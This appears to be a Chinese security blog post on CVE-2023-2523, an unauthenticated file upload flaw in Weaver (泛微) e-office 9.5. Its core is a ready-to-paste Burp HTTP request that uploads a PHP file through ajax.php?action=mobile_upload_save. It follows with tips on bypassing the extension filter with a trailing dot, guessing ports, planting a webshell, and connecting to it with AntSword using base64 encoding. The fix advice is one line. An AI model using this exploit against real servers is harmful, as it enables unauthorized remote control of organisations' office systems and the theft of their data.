聲明
本文僅用于技術(shù)交流，請勿用于非法用途
由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失，均由使用者本人負(fù)責(zé)，文章作者不為此承擔(dān)任何責(zé)任。
文章作者擁有對此文章的修改和解釋權(quán)。如欲轉(zhuǎn)載或傳播此文章，必須保證此文章的完整性，包括版權(quán)聲明等全部內(nèi)容。未經(jīng)允許，不得任意修改或者增減此文章內(nèi)容，不得以任何方式將其用于商業(yè)目的。
?

簡介

泛微OA是中國領(lǐng)先的OA辦公自動化產(chǎn)品商，是一套集OA、合作、工作流一體化的企業(yè)級信息化管理軟件。它可以幫助企業(yè)實踐現(xiàn)辦公自動化、信息協(xié)同、決策智能化等功能，提升企業(yè)生產(chǎn)效率和管理水平，是企業(yè)數(shù)字化轉(zhuǎn)型和數(shù)字化辦公的好工具。

泛微OA提供了完整的辦公自動化解決方案，包括郵件管理、日程管理、文檔管理、簽批審查、會議管理、考勤管理、人力資源管理等模塊，支持PC端、移動端多種應(yīng)用場景。同時，它還可以與各種企業(yè)管理系統(tǒng)（如ERP、CRM等系統(tǒng)）進(jìn)行整合，形成完整的業(yè)務(wù)流程和信息鏈條。

漏洞概述

漏洞編號? cve-2023-2523

? ? 泛微e-office 9.5版本，源文件 App/Ajax/ajax.php?action=mobile_upload_save 的一些未知功能存在問題。 參數(shù) upload_quwan 的操作導(dǎo)致不受限制的上傳，未經(jīng)身份驗證的惡意攻擊者通過上傳惡意文件，從而獲取目標(biāo)服務(wù)器的控制權(quán)限。

漏洞利用

?poc如下，復(fù)制替換burp的請求包

POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1
Host: xxx.xxx.xxx.xxx:xxxx
Content-Length: 351
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: LOGIN_LANG=cn; PHPSESSID=a928fd476c924660715ba69920ee6788
Upgrade-Insecure-Requests: 1------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="1.php."
Content-Type: image/jpeg<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

重發(fā)一下，查看返回信息

?這里大家可以看到 ，返回包中有完整的路徑，直接訪問

tips：這里1.php.是為了繞過過濾條件，訪問的時候不要加php后面的點(diǎn)

正常情況下應(yīng)該是這樣

?還有這種情況

盲猜應(yīng)該是8080或者8088

?

?如果是漏洞環(huán)境的話，大家可以嘗試放個🐎，我這里就不能給大家演示了

使用蟻劍鏈接時注意

tips:必須要使用base64編碼?

最好的情況是使用蟻劍的編碼器，之前發(fā)表的。

修復(fù)建議

升級版本，打補(bǔ)丁

泛微e-office體驗服務(wù)中心_泛微移動辦公OA系統(tǒng)標(biāo)準(zhǔn)版_中小組織辦公數(shù)字化產(chǎn)品